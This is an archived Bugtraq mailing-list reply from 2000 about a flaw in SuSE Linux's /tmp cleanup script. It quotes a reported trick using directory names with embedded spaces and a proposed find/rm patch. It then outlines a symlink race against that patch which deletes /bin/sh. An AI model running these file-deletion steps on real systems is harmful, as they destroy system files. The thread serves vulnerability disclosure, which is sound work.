Bugtraq mailing list archives
Re: local user can delete arbitrary files on SuSE-Linux
From: peak () ARGO TROJA MFF CUNI CZ (Pavel Kankovsky)
Date: Sun, 23 Apr 2000 00:03:04 +0200
On Fri, 21 Apr 2000, [ISO-8859-1] Peter Münster wrote:
If MAX_DAYS_IN_TMP > 0 in /etc/rc.config on a SuSE-Linux system, a local user can delete arbitrary files by doing some commands like these: mkdir -p "/tmp/hhh /somedirectory" touch -t some-early-date "/tmp/hhh /somedirectory/somefile" sleep 1d
...
Here a possible patch for suse-package aaa_base-2000.1.3-0:
...
+ find $TMP_DIR/. $OMIT ! -type d \ + -atime +$MAX_DAYS_IN_TMP -exec rm -f '{}' ';' + find $TMP_DIR/. $OMIT -depth -type d -empty -mindepth 1 \ + -mtime +$MAX_DAYS_IN_TMP -exec rmdir '{}' ';'
mkdir -p /tmp/somedirectory/{_junk,bin} fill_with_lots_of_junk_to_slow_find_down /tmp/somedirectory/_junk find /tmp/somedirectory -type f | xargs touch -t some-early-date touch -t some-early-date /tmp/somedirectory/bin/sh wait_until_aaa_base_starts_searching /tmp/somedirectory/_junk mv /tmp/somedirectory /tmp/somedirectory2 ln -s / /tmp/somedirectory watch /bin/sh disappear...this will teach you not to use find and rm to clean /tmp :) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation."
Current thread:
- Re: Reappearance of an old IE security bug Elias Levy (Apr 19)
- Re: Reappearance of an old IE security bug Darren Reed (Apr 19)
- DOS attack against HP JetDirect Printers (fwd) Alfred Huger (Apr 20)
- Re: DOS attack against HP JetDirect Printers (fwd) Hobbes Gobs Llin (Apr 20)
- another WU imapd buffer overflow Michal Szymanski (Apr 20)
- Re: DOS attack against HP JetDirect Printers (fwd) Gwendolynn ferch Elydyr (Apr 20)
- Re: DOS attack against HP JetDirect Printers (fwd) Ben Woodard (Apr 21)
- local user can delete arbitrary files on SuSE-Linux Peter Münster (Apr 20)
- Re: local user can delete arbitrary files on SuSE-Linux Pavel Kankovsky (Apr 22)
- Re: DOS attack against HP JetDirect Printers (fwd) Terran Melconian (Apr 21)